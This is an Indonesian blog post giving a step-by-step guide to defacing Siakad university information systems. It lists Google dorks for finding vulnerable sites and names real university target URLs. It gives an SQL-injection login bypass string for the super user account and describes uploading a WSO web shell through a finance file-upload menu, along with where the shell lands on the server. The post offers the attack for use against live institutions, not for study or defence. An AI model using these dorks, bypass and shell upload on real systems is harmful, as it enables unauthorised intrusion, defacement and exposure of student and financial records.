Pages

Sunday, 5 June 2016

Cara Deface Web Informasi Siakad

dork :
inurl:"?mnux=" intext:siakad
inurl:"?mnux=" intext:akademik
inurl:"?mnux=" intext:sisfo
inurl:"?mnux=" site:id
inurl:"?mnux=" site:com
inurl:"?mnux=" site:net 

live target : http://aplikasi.triatma-mapindo.ac.id/simak-stie/?mnux=

1. Copy lalu paste dork diatas ke google dan akan muncul target seperti gambar bawah. Silakan kalian pilih yg mau di deface...





2. setelah masuk tampilan awal akan seperti gambar bawah. trus kalian pilih super user.


3. Disini kita disuruh memasukan username dan password kalian masukkan aja username dan passwordnya '=''or' lalu login.


4. Bisa langkah ketiga tadi? kalo bisa tampilannya kayak gambar dibawah. Nah langkah selanjutnya kalian pilih menu keuangan >> 02 File Biaya Mhsw.


5. isikan semua kolom trus klik Upload File dari Bank jika sudah mengisi kolomnya.


6. akan muncul tempat upload silakan kalian upload shell kalian. Disini saya mengupload shell WSO.



7. Tunggu proses proses sampai selesai.


8. Untuk letak shell kalian tadi di folder mana, contoh disini kalian menggunakan live target maka letaknya http://siap.stba-pertiwi.ac.id/tmpbank/wso.php



sumber:https://selapancyber.blogspot.co.id

3 comments:


  1. awesome blog. i like this post and its very helpful to us. Thankyou For shearing This Information With Us. IT

    consultant company

    ReplyDelete
  2. gimana cara tahu password nya ?

    ReplyDelete